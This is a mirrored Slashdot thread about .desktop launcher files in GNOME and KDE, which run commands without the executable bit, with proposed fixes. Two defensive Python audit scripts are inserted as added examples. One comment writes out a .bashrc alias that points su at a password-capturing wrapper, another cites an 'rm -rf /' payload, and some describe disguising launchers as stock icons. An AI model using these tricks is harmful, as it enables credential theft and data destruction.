Slashdot Mirror


Malware Threat To GNOME and KDE

commandlinegamer writes "foobar posted on his blog recently about 'How to write a Linux virus in 5 easy steps,' detailing potential malware infection risks in the .desktop file format used by GNOME and KDE. This is not a new threat, and it appears to still be a risk, as discussions in 2006 did not seem to come to any firm conclusion on how to deal with the problem." There's a followup on LWN.


  1. Solution by Spazztastic · · Score: 5, Funny

    Use Linux... wait, shit. We need a new answer, guys.

    --
    Posts not to be taken literally. Almost everything is sarcasm.
    1. Re:Solution by zappepcs · · Score: 5, Insightful

      The answer is the same one that has been valid for .. well, since the advent of computers. There will always be vulnerabilities. The best you can do is be aware, vigilant, and choose software that has less vulnerabilities and whose writers work hardest to correct the problems fastest. Arguments can be made for or against Linux based on those criteria but it remains a very strong choice over Windows or Apple. The more popular Linux becomes on the desktop, the more chances there will be vulnerabilities. Now is the time for F/OSS coders to start working extra to ensure there are as few as possible.

      If you write code, you know that you've left open areas where an exception will cause a problem for any number of reasons. It happens. Period. So far, GNU/Linux has cleaned up quickly and well on most things. The struggle continues. That is the answer.

    2. Re:Solution by Lumpy · · Score: 5, Insightful

      Have a brain when using the PC.

      It works for all operating systems. Viruses and Trojans require the user to not think and execute things willy-nilly. Having a brain reduces the infection vectors drastically.

      Every "expert" I have met that has been infected was downloading and using warez unsafely. Every regular user I have met that was infected simply clicked yes to every dialog box they did not want to bother reading and understanding.

      The OS does not matter, having educated and competent users does. Have to add that competent, I have seen educated users go and click on crap without reading or thinking.. It requires competence.

      --
      Do not look at laser with remaining good eye.
    3. Re:Solution by Spazztastic · · Score: 2, Insightful

      > Having a brain reduces the infection vectors drastically.

      I forgot sarcasm tags when starting this thread, but there's also many other problems outside of "not having a brain." Unpatched flaws in your operating system, people still running IE6 and opening a JPEG with a script embedded, etc. One can be very intelligent at something completely unrelated to computers and still get infected purely because of a popup and an unpatched system.

      Not everybody knows to run windows update or to update their Ubuntu installation even if it warns them, because it's usually being inconvenient. Usually it's why I set it to do it automatically for users or they won't.

      --
      Posts not to be taken literally. Almost everything is sarcasm.
    4. Re:Solution by Ed+Avis · · Score: 5, Insightful

      > Have a brain when using the PC.

      This has very little to do with user stupidity. Indeed, users should not execute things willy-nilly, but it's surely okay to open a file and look at its contents? If you think that is inherently unsafe then users must be prohibited from receiving email attachments (or downloading from web pages) altogether.

      In this case there are no warning dialogues to click through, no unusual steps. All that happens is you save a file and then double-click to open it. There is no way to see in advance that the file is unsafe, and it can adopt any icon and name it wishes, so in the user interface it is *indistinguishable* from a legitimate desktop icon such as the trash can.

      It gets a laugh on Slashdot to castigate 'stupid' users, but if the system does not provide users with the information needed to make an informed choice, then the system is at fault.

      --
      -- Ed Avis ed@membled.com
    5. Re:Solution by Ed+Avis · · Score: 3, Informative

      > The best you can do is be aware, vigilant, and choose software that has less vulnerabilities and whose writers work hardest to correct the problems fastest.

      Which in this case is unlikely to be GNOME or KDE, since this attack has been known for several years and absolutely nothing has been done about it (it's "expected behaviour").

      --
      -- Ed Avis ed@membled.com
    6. Re:Solution by zappepcs · · Score: 2, Informative

      I tried to make it a choice by the end user as to which is less vulnerable. MS products have/had similar issues by length and criticality. So if any and all of your choices can and will have such vulnerabilities, use other criteria for your choice.

      On a side note: Worse than having a vulnerability in the code base for several months or years is having it left there intentionally, and marginally worse is when users ignore the patch when it is provided. With Linux patches are free. With Windows products you need to be a legal registered user and/or have paid for updated anti-malware software. Consequently it costs you more to apply fixes for some OSes compared to Linux.

      So, in the end it is still down to the user to do their part. No matter what efforts the coders put in, if the user fails the malware will spread.

      I'm not apologizing for bugs/problems in Gnome/KDE code. I'm simply saying that such an event only makes it software. When those packages continue to have such errors on a regular schedule and with end effects that MS has tortured the world with, then it's reason to complain.

    7. Re:Solution by bigstrat2003 · · Score: 4, Insightful

      > With Linux patches are free.

      And they are with Windows as well. Come on, it's more than a bit ridiculous to expect Microsoft to supply patches to people who pirate their software. If you've bought your copy of Windows, patches are free. There may be a bug with validating your copy, but that's also a mistake, not by design.

      --
      "16MB (fuck off, MiB fascists)" - The Mighty Buzzard
    8. Re:Solution by zappepcs · · Score: 3, Insightful

      My poorly stated point is that those pirated copies are not being patched appropriately and thus represent a larger target for malicious software authors, making Windows a little bit less desirable from that point of view.

    9. Re:Solution by pipatron · · Score: 2

      Windows security patches are free for pirated versions of Windows. Don't ask me how I know this...

      --
      c++; /* this makes c bigger but returns the old value */
    10. Re:Solution by BluenoseJake · · Score: 3, Insightful

      Actually, it makes people who are too cheap to pay for Windows, but too lazy or uninformed to use OSS less desirable, not Windows.

    11. Re:Solution by jank1887 · · Score: 2, Funny

      TRS-80, here we come!

    12. Re:Solution by Anonymous Coward · · Score: 2, Informative

      Remember the Melissa "I Love You" virus that first came out maybe a decade ago?

      Ha ha!, I thought, How stupid do you have to be to open a file that is sent to you and all it says is "Hey, look at this picture!".

      Certainly, it should be quite suspicious. No comments. No "Hi, how are you.". Plus, the news was already out that you should be very, very careful.

      Well, my workplace, which was full of some very talented and bright developers got infected. Our whole network slowed to a crawl as more and more emails were being sent to everyone. I was receiving hundreds of emails each minute. One of our top developers admitted he was the one that caused the infection. He was actually waiting for his friend to send him a file, and when the virus mail came, he clicked on it.

      "Using your brain" doesn't always work. I've talked to brilliant developers who found themselves suddenly caught in a phishing scam.

      Even I was almost caught. I received a phone message from an 800 number about a problem with my credit card. I called back the 800 number, to find out what the problem was.

      The first thing they asked for was my credit card number. My son started screaming at me not to give the number and I relented. We did a Google search and to my surprise, he was right. It was a phishing expedition.

      Remember: I wasn't called. I called an 800 number. The person didn't simply answer "Hello", they identified themselves as my credit card issuer without any prompting. If my son didn't stop it, I would have given some stranger who was masquerading as my credit card issuer my credit card number.

      The book "The Design of Everyday Things" talks about a software program (pre-Windows) that had the user press the key (sometimes called by the right side of the keyboard on some occasion, and other times, the key by the numeric keypad.

      Users were having severe issues. The developers blamed it on the users because the directions clearly distinguished between the two keys. Even the users felt stupid because they felt they should have known better. In the end, a UI designer stepped in and eliminated this distinction between the two keys, and solved the problem.

      Sometimes, "Use Your Brain" is simply an excuse to allow bad design to be ignored rather than fixed. If enough users are having difficulties with a certain situation, it isn't enough to castigate them on their lack of intelligence.

    13. Re:Solution by Just+Some+Guy · · Score: 3, Insightful

      > Come on, it's more than a bit ridiculous to expect Microsoft to supply patches to people who pirate their software.

      Remember that story about vaccinations the other day? Herd immunity is vitally important, and patching illegitimate installations makes the world safer for legitimate users. This in turn goes a way toward improving Microsoft's security reputation to something greater than Swiss cheese.

      --
      Dewey, what part of this looks like authorities should be involved?
    14. Re:Solution by Ed+Avis · · Score: 2, Interesting

      Yes, I do believe it should be safe to *open* any file from any source. If double-clicking a file to open it is unsafe, that needs to be fixed. Look at the security alerts for free software: a large proportion are things like 'a bug in the file decoding might allow an attacker to overwrite the stack by making a specially crafted PNG file'. These are treated as security holes and fixed, because it must be safe to merely *open* and view a PNG file (or whatever) from any source.

      The idea that some files are 'bad files' which you should not even open to look at is a screwed-up view of the world that comes from Windows, where the OS and applications don't usually bother to make any distinction between opening and executing. On a sensible system, there is no reason to be afraid of using email and viewing attachments. I have absolutely no fear about saving any attachment from any source and opening it in emacs to view it. The desktop environment can and should provide the same safety.

      To continue your analogy: the bug is that currently, with .desktop files, GNOME doesn't give you any way to see what it is apart from putting it in your mouth. Just as with any other kind of file, it should just display the contents for viewing, and not try to taste it unless the file is explicitly marked executable.

      --
      -- Ed Avis ed@membled.com
    15. Re:Solution by Ed+Avis · · Score: 3, Informative

      The vulnerability is in the way the desktop environment hides information from the user so you have no way (even if you are an experienced and responsible user) to avoid executing the malware. You get an attachment by mail, you just save it to look at it and see what it is (a one-click, and expected-safe operation) but when it appears on the desktop background, it's disguised as something else (the .desktop file can choose any icon and name it wants), and double-clicking to view the file in fact *executes* the code without asking you.

      What should happen: you save the file; if you chose to save it to the desktop background it appears there, but because it's not marked executable it will not run when you double-click it. Instead the file contents open in a text editor, or some other fairly boring but safe action.

      --
      -- Ed Avis ed@membled.com
    16. Re:Solution by jonadab · · Score: 3, Funny

      > You get an attachment by mail, you just save it to look at it and
      > see what it is (a one-click, and expected-safe operation)

      You do *WHAT*?

      > but when it appears on the desktop background

      Wait, not only do you deliberately save random unidentified email attachments, you save them to the DESKTOP?

      Whatever is wrong with you, it's no little thing.

      > What should happen:

      What should happen, when you get an email attachment and you do not know what it is, is that you either ignore it, or if you have a certain morbid curiosity you maybe save it in /tmp and look at it in something that will treat it as random data (e.g., a hex editor) or use a file-magic utility to determine what kind of content it has in it.

      Under no circumstances should an unidentified email attachment ever get anywhere near your desktop. If you don't understand this, maybe you should let your network administrator run that attachment stripper on the MTA like he keeps threatening to do every time he has to rebuild your workstation.

      With that said, I do think .desktop files are an inherently bad idea, although they're pretty irrelevant to me since I don't even have nautilus in my session. It's a resource hog, and I never use it. I haven't had any desire to use a graphical file manager since I discovered tab completion sometime in the nineties. This does mean my background is a plain color instead of a pretty picture, but since I generally have a lot of windows open I never *see* much of the background anyway. Instead of icons on the desktop, I keep launchers on the left-side panel, and in drawers.

      --
      Cut that out, or I will ship you to Norilsk in a box.
  2. Frost piss by digitalunity · · Score: 3, Interesting

    Interesting article. Cliff notes for those who don't read articles: KDE & Gnome desktop icons can contain malicious commands.

    The common defense that "well at least linux malware can't get root privileges" isn't much of a defense. For many users, the most sensitive documents they have are owned by themselves.

    --
    You can't legislate goodness. Let each to his own destiny, by will of his freely made choices.
    1. Re:Frost piss by Todd+Knarr · · Score: 4, Insightful

      It does make a big difference in clean-up, though. With the malware not being able to get administrative privileges, it can't get into root's environment. That means that you can log in as root and the malware won't get a chance to take over, and then you can safely use all your scanning and clean-up tools without having the malware disable or circumvent them. Contrast this with how thoroughly rootkits can hide on Windows systems.

      It's still dangerous, make no mistake. Once the malware's running locally, it can try local exploits to escalate to root access. But there's a lot fewer of those on Linux systems than on Windows, and they're a lot harder to exploit, and anything that doesn't successfully exploit them will be much easier to detect and remove. This is a significant win compared to Windows.

      NB: nothing will protect a system from its owner's stupidity. If the user insists on being willfully stupid, they're in a position to bypass any and all protections on the system. The only protection is to keep them away from the keyboard.

    2. Re:Frost piss by Fallingcow · · Score: 2, Insightful

      > It does make a big difference in clean-up, though. With the malware not being able to get administrative privileges, it can't get into root's environment. That means that you can log in as root and the malware won't get a chance to take over, and then you can safely use all your scanning and clean-up tools without having the malware disable or circumvent them. Contrast this with how thoroughly rootkits can hide on Windows systems.

      Really though, especially if we're talking about my personal desktop or laptop, if I notice any kind of infection I'm just going to format->reinstall. It is not remotely worth my time to verify that the virus did not achieve root privileges when reinstalling will take care of the problem much more quickly and thoroughly.

      I've used Linux for years, but I still don't get the "OMG don't run as root!" obsession. I don't run as root exactly (I like being under /home rather than /root) but I give myself nearly-root permissions and remove password prompts from everything that I can. Why? Because I'm the only one who uses my laptop, all the stuff I care about is in my ~/ folder, and the discovery of any virus of any kind whatsoever is going to mean an instant format->reinstall anyway.

      On servers? Sure. Multiuser workstations? Sure. At home? Running as a regular user is just way more hassle than it's worth. Oh no! The virus got in to the /boot directory! So what? Who gives a shit about /boot? I care about ~/Music or ~/Downloads far, far more.

    3. Re:Frost piss by psetzer · · Score: 2, Interesting

      Escaping notice is the most important part of keeping malware on system. After it's found, the question is more about how painful it is to get off the system than whether it's going to get removed. Since modern malware authors want their software to stick around in the background for as long as possible, they just avoid doing anything outrageous and let the zombie send out a trickle of emails.

      Experience with Windows users shows that the average end user who's willing to click on something like the author was talking about isn't going to get suspicious and won't suspect something two levels deep in a dot folder with an official/cryptic sounding name. They can be brazen and call it 'smtpmmd' for SMTP mass mailer daemon and it'll still probably slip under the radars of at least a few people who know how to look at their active processes. The only real solution is an automated searching tool and at that point you're doing the same thing as all the Windows AV programs, just with a somewhat easier time of it.

      --
      "Anyone who attempts to generate random numbers by deterministic means is living in a state of sin." -- John von Neumann
    4. Re:Frost piss by Todd+Knarr · · Score: 2, Informative

      I advocate the "Don't run as root." position for two reasons. One, it builds good habits from the start, both for users and for software vendors. It gets users used to running as ordinary users, and conditions them to expect the system to function correctly without administrative privileges except when explicitly doing administrative tasks. We've seen on Windows how many problems keep sticking around simply because of habits users have developed over the years. Inertia works, so put it to good use instead of bad. If you teach users good habits initially, they're likely to stick with them. And it gets software vendors used to living in a world without administrative privileges. When most users expect not to need admin privileges to use software, their reaction to software that expects admin privileges is to go "WTF? Why do you need that again?" and to go with other software if the vendor insists on requiring the user to break their existing habits (users are lazy and don't like changing their ways, remember). That yields a feedback loop: vendors produce software that doesn't require admin privileges because users react badly to stuff that demands admin rights for no good reason, and users react badly to software that demands admin privileges for no good reason because 99% of the software they work with "just works" without admin privileges being needed.

      It's also a safety net. If I manage to bork up my user account, root's still sitting there untouched and I can still log in and repair the damage. It's like having a spare set of car keys in your wallet: you won't lock yourself out often, but when you do it's an incredible relief to pull out your wallet and find you don't have to call for help.

  3. Virus? by Carewolf · · Score: 5, Insightful

    It relies on the user downloading, saving and running a shell-script. The only trick here is that in this KDE/GNOME form the user does not need explicitly to add execution rights on the file.
    Still hardly a virus, more like a gun without a safety switch. It is one step easier for someone to shoot themselves this way.

    Interestingly if we wish to reinforce the 'chmod +x' scheme, desktop files should need a +x (or some other non-MIME property) to be treated specially by GNOME and KDE. Might be an idea.

    1. Re:Virus? by TheLink · · Score: 2, Insightful

      Since we're talking about desktop computers, who in their right mind cares about "installs"?

      I care more about user data.

      I can get "install" data from the DVD/CD and Distro update service.

      But I cannot always retrieve the most recent user data from backups.

      Losing a day's work or even an hour's work can be more pain than having to reinstall the OS.

      Of course it's different if you are one of those users that installs an operating system just for the purpose of playing with themes, etc but not doing any significant work.

  4. Re:Does not work as advertised by argiedot · · Score: 3, Insightful

    I am a bloody fool. I managed to read the article without reading the article. It works.

  5. Re:Stay away from root by argiedot · · Score: 4, Insightful

    Well, the author here seems to emphasise that that won't help because on a single-user account, your priority is your data. If you lose your system but your data isn't compromised, you lose very little that can't be replaced. If you lose your data but your operating system is functional, you have lost nearly everything of value.

  6. Wow, please mod this to -1 by Dripdry · · Score: 3, Funny

    Sorry, wrong thread, too many tabs.

    --
    -
  7. Re:Protect your self with encryption by JesseMcDonald · · Score: 5, Informative

    Why do shortcuts need to have the ability to run code?

    The shortcut only contains parameters for the path to the application and a list of parameters; it doesn't run any code itself. The problem is that the application can be (e.g.) /usr/bin/perl, and the parameters "-e 'perl code here'". Removing this ability would seriously impact the usefulness of the shortcuts.

    The real issue is that the DEs are blindly trusting a non-executable file of unknown source to provide this information. The solution has already been suggested: turn all .desktop files into scripts (via a #! line, which is already valid comment syntax), mark them as executable, and have the DE run them like any other executable file. Non-executable .desktop files which link to applications would be displayed as usual, but would be treated as documents rather than launchers.

    --
    "The state is that great fiction by which everyone tries to live at the expense of everyone else." - Bastiat
  8. Did you even RTFA? by brunes69 · · Score: 4, Informative

    He is not talking about shell scripts at all. The whole point of the article is a .desktop file does not need to be +x to execute it, KDE and Gnome execute commands in it automatically regardless. So all they have to do is save it and click on it.

    1. Re:Did you even RTFA? by argiedot · · Score: 4, Insightful

      Yes, I read it again after it struck me that it seemed rather odd that something so obvious would be called a 'security flaw'. You are right and I am wrong.

    2. Re:Did you even RTFA? by styryx · · Score: 5, Funny

      > You are right and I am wrong.

      W...w...wh....what the fuck just happened?! Am I on the internet still?

  9. Great news by AlHunt · · Score: 5, Funny

    So we have a long-known, unaddressed vulnerability and easily accessible instructions on writing a Linux virus.

    Does this mean Linux is finally "ready for the desktop"?

    --
    1 in 4 Maine children in struggle with hunger.
    1. Re:Great news by Anonymous Coward · · Score: 5, Funny

      No, it means malware is finally ready for the .desktop

    2. Re:Great news by gzipped_tar · · Score: 3, Insightful

      I get your humor, but this may be the only way for Linux to claim the "year of Linux on the desktop".

      I mean bug-to-bug, bullshit-to-bullshit compliance to MS Windows. People are fed crap to grow up and they ask for more crap. At least this is what I think I got from GNOME.

      I used to have a sig. saying "so this is how Linux dies -- with thunderous applause." I changed it after being protested by someone as AC (and partly in fear of being sued by LucasFilm ;) I've always feared that the year of Linux on the desktop would be the year of its death, because the line between "being popular" and "lowering standards to cater to the mass" is so easily blurred.

      Luckily I've escaped to using minimal WMs and I'm not that dependent on the GUI.

      Anyone can think I'm an elitist troll and mod me down accordingly. I'm open to mods and criticism because I know I may be wrong. OTOH I mean what I said. I like Linux and I'll be more than happy to see it prevailing. However, according to the current computer-literacy of your typical desktop user I can only say that the desktop market is not ready for Linux. Shovelling it down your average user's throat (and trying to prioritize "making it a less painful process") could result in the degradation of Linux.

      --
      Colorless green Cthulhu waits dreaming furiously.
    3. Re:Great news by Saint+Stephen · · Score: 2, Funny

      You really shouldn't call your dad a "test case."

  10. Today's file managers are going wild... by gzipped_tar · · Score: 2, Insightful

    Everyone is trying to mimic the brain-dead M$ Way.

    Just think of the idea. You click on the icon (who knows what the picture would suggest) and the file path is passed to an "interpreter" (be it oowriter, emacs or python or ld.so) you may not know. This is a terrible idea to begin with.

    That's why I use file managers almost only for bulk copying / moving. And I still prefer the CLI if the file names are regular-ish enough.

    --
    Colorless green Cthulhu waits dreaming furiously.
  11. OpenBSD by jgtg32a · · Score: 3, Funny

    Linux noobs you should be using OpenBSD from a shell.

  12. Re:Protect your self with encryption by JesseMcDonald · · Score: 2, Insightful

    That would require a blacklist of script interpreters, which could only be a temporary solution. No blacklist is ever going to cover all possible attack vectors. Similarly, checking for particular parameter length will either have too many false positives or fail to catch potential attacks. E.g., what if the command was /bin/rm and the parameters were "-rf /"?

    Requiring the executable bit would make for a more permanent solution to the problem.

    --
    "The state is that great fiction by which everyone tries to live at the expense of everyone else." - Bastiat
  13. Re:Linux Users Don't Backup?!? by digitalunity · · Score: 3, Insightful

    Don't be so shortsighted. The issue isn't you losing your files. It is that others can obtain your files.

    Just because malware doesn't have root privileges doesn't mean it isn't capable of stealing valuable information from you.

    --
    You can't legislate goodness. Let each to his own destiny, by will of his freely made choices.
  14. Re:Protect your self with encryption by Ed+Avis · · Score: 4, Informative

    Yeah it's pretty straightforward: if the executable bit is not set then the file is merely *displayed* as a plain text file. If the executable bit is set then it is *run*.

    That means you cannot simply save an attachment from a message and run it. You can however display it, which is fine.

    Everything works like this except for .desktop files, which because of an oversight, default to *running* on double-click even if not marked executable. Hence the attack vector. It is made nastier by the fact that .desktop files can disguise themselves with a name and icon of their choosing.

    --
    -- Ed Avis ed@membled.com
  15. Re:Not really news... by geantvert · · Score: 3, Insightful

    The first problem is indeed that a desktop file does not require the executable bit to be executed (from Nautilus) by double-clicking it.

    The second problem is that the file content specifies its icon, name and tooltip regardless of the filename of the desktop file.

    For example, a very efficient way to fool people could be to disguise the desktop file as one of the default icons of the desktop (Trash, Computer, Home, ...)

    For the virus writer the only problem is to get the desktop file to be saved in the Desktop directory.

    Humm... Guess what is the default directory of most applications for saving uploaded files? I give you a hint. The name starts with a 'D'.

    Even better, it is possible to specify that the Desktop is the HOME. I haven't checked recently but I remember that this used to be the default in Ubuntu.

    My advice is simple: Start gconf-editor and disable the configuration key /apps/nautilus/preferences/show_desktop to get rid of all desktop icons.

  16. Lame by DesertBlade · · Score: 2, Insightful

    It is the equivalent of downloading a Picture.jpg.bat that deletes *.* from Windows. Windows hides the extension (.bat) so it would be easy to double click on it and bam no more files. Yes the icon would look different.

    I have previews turned on in Gnome so I can actually see the picture before I run the code.

    --
    Half of writing history is hiding the truth.
  17. Re:Protect your self with encryption by blue+trane · · Score: 2, Funny

    Nah, you don't speak for me.

  18. Re:Stay away from root by emocomputerjock · · Score: 2, Insightful

    Data theft is much more nefarious and dangerous than data destruction and usually the primary goal of anyone attempting to exploit a system. Backups are great, but using personal data for financial gain is the name of the game nowadays.

  19. Fast fix by Todd+Knarr · · Score: 4, Interesting

    Fast, simple fix for this: make .desktop files scripts. Start them with "#!/usr/bin/false" or something so that if just executed from the command line they don't do anything, just fail. Gnome and KDE expect all entries to start with that and be executable. If they're executable, they act normally. If they aren't executable, the contents or their properties are displayed instead. If they don't start with the hash-bang line, the interface prompts the user for whether they want to display or execute the entry.

    A fancy elaboration could register a binary-format handler (similar to the one Wine registers) that would recognize the "[Desktop Entry]" starting the file as a binary format and, if the file was executable, trigger the interface to act on the entry. That could remove the need for the hash-bang first line, but there's some other potential holes I'd have to analyze for impact.

    1. Re:Fast fix by JesseMcDonald · · Score: 4, Interesting

      Why not just make a proper interpreter for .desktop files, and use that in the first line ("#!/usr/bin/desktop-launcher")? Then the DEs could always run executable files, and always display non-executable files. As a bonus, you could run launchers from the command-line.

      --
      "The state is that great fiction by which everyone tries to live at the expense of everyone else." - Bastiat
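An added example (not code from GNOME, KDE or any commenter): a read-only Python audit that applies the display/launch/prompt rule from the "Fast fix" comment and reports the two indicators from the "Not really news..." comment, namely an Exec line on a file without the executable bit and a Name that imitates Trash, Computer or Home. The function names and the sample files it builds are constructed for illustration; nothing in a scanned file is ever executed.

```python
import os
import stat
import tempfile

# Default desktop icon names listed in the "Not really news..." comment.
DEFAULT_ICON_NAMES = {"trash", "computer", "home"}


def parse_desktop_entry(text):
    """Return the key/value pairs of the [Desktop Entry] group only."""
    entry, in_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):  # a "#!" first line is a comment too
            continue
        if line.startswith("[") and line.endswith("]"):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, _, value = line.partition("=")
            entry.setdefault(key.strip(), value.strip())
    return entry


def launch_policy(path):
    """Rule proposed in the "Fast fix" comment (not current DE behaviour):
    no hash-bang line -> prompt; hash-bang + x bit -> launch; else display."""
    executable = bool(os.stat(path).st_mode & stat.S_IXUSR)
    with open(path, "rb") as fh:
        has_shebang = fh.read(2) == b"#!"
    if not has_shebang:
        return "prompt"
    return "launch" if executable else "display"


def audit(directory):
    """Describe every .desktop file in a directory without running anything."""
    findings = []
    for name in sorted(os.listdir(directory)):
        if not name.endswith(".desktop"):
            continue
        path = os.path.join(directory, name)
        with open(path, encoding="utf-8", errors="replace") as fh:
            entry = parse_desktop_entry(fh.read())
        executable = bool(os.stat(path).st_mode & stat.S_IXUSR)
        shown = entry.get("Name", name)  # label the user actually sees
        findings.append({
            "file": name,
            "shown_as": shown,
            "icon": entry.get("Icon", ""),
            "exec": entry.get("Exec", ""),
            "policy": launch_policy(path),
            # The behaviour the thread objects to: a command, but no x bit.
            "runs_without_x": bool(entry.get("Exec")) and not executable,
            # The displayed name copies one of the stock desktop icons.
            "imitates_default": shown.strip().lower() in DEFAULT_ICON_NAMES,
        })
    return findings


def demo():
    """Audit three constructed sample files written to a temporary directory."""
    samples = {
        # Saved attachment: no x bit, no hash-bang, labelled like the trash can.
        "photo.desktop": (0o644, "[Desktop Entry]\nType=Application\n"
                                 "Name=Trash\nIcon=user-trash\n"
                                 "Exec=/bin/echo constructed-sample\n"),
        # Launcher in the proposed format: hash-bang line plus x bit.
        "editor.desktop": (0o755, "#!/usr/bin/false\n[Desktop Entry]\n"
                                  "Type=Application\nName=Editor\n"
                                  "Exec=/usr/bin/editor %f\n"),
        # Proposed format, but the x bit was never granted.
        "notes.desktop": (0o644, "#!/usr/bin/false\n[Desktop Entry]\n"
                                 "Type=Application\nName=Notes\n"
                                 "Exec=/usr/bin/editor notes.txt\n"),
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, (mode, body) in samples.items():
            path = os.path.join(tmp, name)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(body)
            os.chmod(path, mode)
        return audit(tmp)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Pointing `audit()` at `~/Desktop` or a download directory lists what each launcher would show and run; a file with `runs_without_x` and `imitates_default` both true matches the disguise described in the thread.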
  20. You are wrong by SmallFurryCreature · · Score: 5, Insightful

    I am dealing with a user at the moment who just isn't that bright. It is not that she is a moron, she just doesn't think. Some things she does right, she gets her wallpapers through Google's image search and uses Firefox after my suggestion.

    But she also wants animated cursors and finds them and happily installs them. Cursor Mania.

    She just doesn't get, yet, that the internet has two kinds of free and that the more something shouts it is free the less likely it is. How do you explain that Firefox is free and safe but cursormania is free and not safe?

    The problem is not so much that some people are stupid but that they lack a healthy dose of cynicism, they forget to question things. And that is pretty to stupid.

    The system can't protect against this unless you want to live in the nanny state. Women are free to go with convicted wife-beaters unless you want the state to decide your partner for you. People can install spyware unless you want the system to decide what you can install.

    For some reason people like you want software to do things you would NEVER accept in hardware. Would you really want a power drill that constantly checked whether you were drilling in the factory approved substances, at the right angle, under the right conditions? A screwdriver that refuses to be used as a hammer?

    At some point users must accept a responsibility to operate their equipment responsibly themselves and accept that if they make mistakes, they are the ones to blame.

    You know what my solution has been to fix 99% of friends' requests to fix their Windows PC? Re-install. Wipe the crap and sooner or later they either figure out that "mmm once I downloaded those free smileys my computer starts to act like a piece of crap, maybe these two things are connected" or at least find someone else to help with their crap PCs.

    Let's face it, after 30 years I have started to realise that no amount of suggestion is ever going to result in girls actually giving any of the sexual favors they seem to promise when they ask you to fix their laptop.

    --

    MMO Quests are like orgasms:

    You may solo them, I prefer them in a group.

    1. Re:You are wrong by Ed+Avis · · Score: 5, Insightful

      What you say is all true but it's not relevant to this particular problem, which is that *all* users, even sensible and cautious ones, can be easily tricked into running an executable because the user interface makes it look exactly like an ordinary file. You or I would also be vulnerable.

      And BTW, I suggest you kiss her first, and fix the laptop afterwards.

      --
      -- Ed Avis ed@membled.com
    2. Re:You are wrong by javilon · · Score: 3, Funny

      Let's face it, after 30 years I have started to realise that no amount of suggestion is ever going to result in girls actually giving any of the sexual favors they seem to promise when they ask you to fix their laptop.

      It seems to me that while they are a bit slow with technology you, on the other hand, are a bit slow at making the (lack of) connection between "fixing laptop" and "getting laid" when social interaction is the issue.

      --


      When his defense asked, "Which computer has Jon Johansen trespassed upon?" the answer was: "His own."
    3. Re:You are wrong by McDutchie · · Score: 3, Insightful

      She just doesn't get, yet, that the internet has two kinds of free and that the more something shouts it is free the less likely it is. How do you explain that firefox is free and safe but cursormania is free and not safe?

      I think I would try that by explaining the difference between free as in freedom and free as in "we will sell your soul to our advertisers".

  21. Not a virus? by pyrr · · Score: 4, Insightful
    I noticed in the TFA that the author claimed that some folks were claiming this didn't meet the definition of 'virus'. It's funny how the definition seems to have changed. I'd have to say this sort of exploit is technically an old-school virus, the sort that is pretty much dependent on a gullible end user to do something stupid, at which point it could dig-in its tentacles. Most modern Windows viruses, including the fake-anti-malware malware that seems to be going around lately, don't require any user interaction whatsoever to get infected.

    When I think of a "virus", well, that's just malicious code, it's something designed to do some form of damage. It's malware-- software that's up to no good. That doesn't describe the delivery method.

    I can see how folks want to draw a distinction based on the severity of the exploit (namely the extent of the potential damage to the system and the level of user interaction), but claiming this isn't a real virus is just silly. Maybe a new definition for the more severe sorts of malware is needed.

  22. Re:Linux Users Don't Backup?!? by ChienAndalu · · Score: 3, Interesting

    Just because malware doesn't have root privileges doesn't mean it isn't capable of stealing valuable information from you.

    I sometimes wonder how difficult it would be to obtain the root password from somebody. If the PATH variable has a path that the user has write access to, what's stopping the malware from putting a "su" wrapper into that directory? Next time you enter su, the wrapper captures your password, logs you in and deletes itself.

    I also think that a keylogger for X11 wouldn't be too difficult to implement.

  23. Re:Linux Users Don't Backup?!? by ChienAndalu · · Score: 2, Informative

    On second thought, you don't even need that. The malware just has to do

    echo "alias su=/tmp/evilwrapperscript" >> ~/.bashrc

    and you're finished
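An audit for the two `su`-shadowing routes described in the comments above (a user-writable PATH directory and an alias in `~/.bashrc`), as an added example that is not part of the original thread. The function names and the sample rc text are assumptions made for illustration.

```python
import os
import re
import shutil

SENSITIVE = ("su", "sudo")  # commands that prompt for a password
# Constructed sample rc file; line 3 is the alias quoted in the comment above.
SAMPLE_RC = "export EDITOR=vi\n# alias su=/bin/su\nalias su=/tmp/evilwrapperscript\n"
_ALIAS = re.compile(r"^\s*alias\s+(?:--\s+)?([\w.-]+)=")
_FUNC = re.compile(r"^\s*(?:function\s+([\w.-]+)|([\w.-]+)\s*\(\))")


def shadowing_definitions(rc_text, names=SENSITIVE):
    """Return (line_no, name, line) for aliases/functions redefining `names`."""
    hits = []
    for no, line in enumerate(rc_text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        m = _ALIAS.match(line)
        name = m.group(1) if m else None
        if name is None:
            f = _FUNC.match(line)
            name = (f.group(1) or f.group(2)) if f else None
        if name in names:
            hits.append((no, name, line.strip()))
    return hits


def writable_dirs_before(path_env, command, is_writable=None, which=None):
    """PATH entries the user can write to, up to and including the one serving `command`."""
    is_writable = is_writable or (lambda d: os.path.isdir(d) and os.access(d, os.W_OK))
    which = which or (lambda c: shutil.which(c, path=path_env))
    real = which(command)
    real_dir = os.path.dirname(real) if real else None
    risky = []
    for d in path_env.split(os.pathsep):
        d = d or "."  # an empty PATH entry means the current directory
        if is_writable(d):
            risky.append(d)
        if real_dir and os.path.normpath(d) == os.path.normpath(real_dir):
            break  # later entries are never reached for this command
    return risky


if __name__ == "__main__":
    rc = os.path.expanduser("~/.bashrc")
    text = open(rc).read() if os.path.exists(rc) else SAMPLE_RC
    print(shadowing_definitions(text))
    print(writable_dirs_before(os.environ.get("PATH", ""), "su"))
```

Any hit from either function means a password typed at an `su` prompt may pass through something other than the system binary.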

  24. Re:Not really news... by extrasolar · · Score: 2, Interesting

    The "Look! nude pictures of [latest chick seen on a hollywood blockbuster] ! If it doesn't open, save and execute" routine is pretty cross-platform. It relies on the Stupidity 0.99995b RC12 Gold API, and it is here to stay.

    Which is wrong and has always been wrong by the way. And it's not "open, save, and double click" not "open, save and execute".

    When someone double clicks an icon that signifies it's an image file, that action should not execute an arbitrary command on your system. There needs to be some sort of guarantee that the icon chosen to represent a file actually represents the file. There is no guarantee with .desktop files. This is a bug damn it, not a feature!

